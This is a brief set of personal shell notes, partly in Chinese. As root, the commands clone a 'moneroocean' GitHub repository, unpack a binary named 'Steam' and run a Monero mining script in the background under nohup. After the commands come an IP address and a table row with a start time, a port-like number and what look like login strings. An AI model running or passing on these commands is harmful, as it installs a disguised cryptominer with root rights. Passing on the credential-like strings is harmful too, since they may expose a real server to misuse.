sudo -i----cd /root && git clone https://github.com/xxq8035/moneroocean.git && cd moneroocean && unzip moneroocean.zip && chmod +x Steam && bash miner.sh



apt install unzip



cd /root && git clone https://github.com/xxq8035/moneroocean.git && cd moneroocean && unzip moneroocean.zip && nohup chmod +x Steam && bash miner.sh > runoob.log 2>&1 &


nohup chmod +x Steam && bash miner.sh > runoob.log 2>&1 &
后台运行





35.89.204.203


+------------------------------+-------+--------+----------------------+
| 启动时间:2023-08-26 14:26:42 | 53121 | nq2eY  | MHGmeKzlPb6B53k0TpDE